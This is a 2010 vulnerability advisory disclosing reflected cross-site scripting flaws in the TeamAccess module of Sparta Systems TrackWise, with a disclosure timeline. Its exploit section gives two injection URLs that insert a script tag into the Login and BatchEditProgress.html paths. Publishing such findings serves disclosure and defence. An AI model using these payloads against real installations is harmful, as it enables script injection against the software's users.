=========================================

Yaniv Miron aka "Lament" Advisory Feb 28, 2010

Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting 
Vulnerabilities

=========================================



=====================

I. BACKGROUND

=====================

TrackWise® by Sparta Systems: A Holistic Approach to Enterprise Quality 
Management 



TrackWise by Sparta Systems is an enterprise quality management solution (EQMS)

that optimizes quality, ensures compliance and reduces costs for world-class 
clients

across a range of industries. TrackWise is the only enterprise quality 
management solution that offers the flexibility and configurability 



to adapt to company-specific business processes,

enabling our world-class clients across a range of industries to define, track, 
manage 

and report on the core activities vital to their success.



http://www.spartasystems.com/trackwise-eqms/



=====================

II. DESCRIPTION

=====================



A malicious attacker may inject scripts into the TrackWise application.



=====================

III. ANALYSIS

=====================



Exploitation of this vulnerability results in the execution of arbitrary

code using a malicious link.



=====================

IV. EXPLOIT

=====================



http://example.com/[TrackWiseDir]/servlet/TeamAccess/Login/";><script>alert('XSS-By-Lament')</script>



http://example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/";><script>alert('XSS-By-Lament')</script>



=====================

V. DISCLOSURE TIMELINE

=====================



Jan 2009 Vulnerability Found

Jan 2009 Vendor Notification

Feb 2010 Public Disclosure



=====================

VI. CREDIT

=====================



Yaniv Miron aka "Lament".

[email protected]

Reply via email to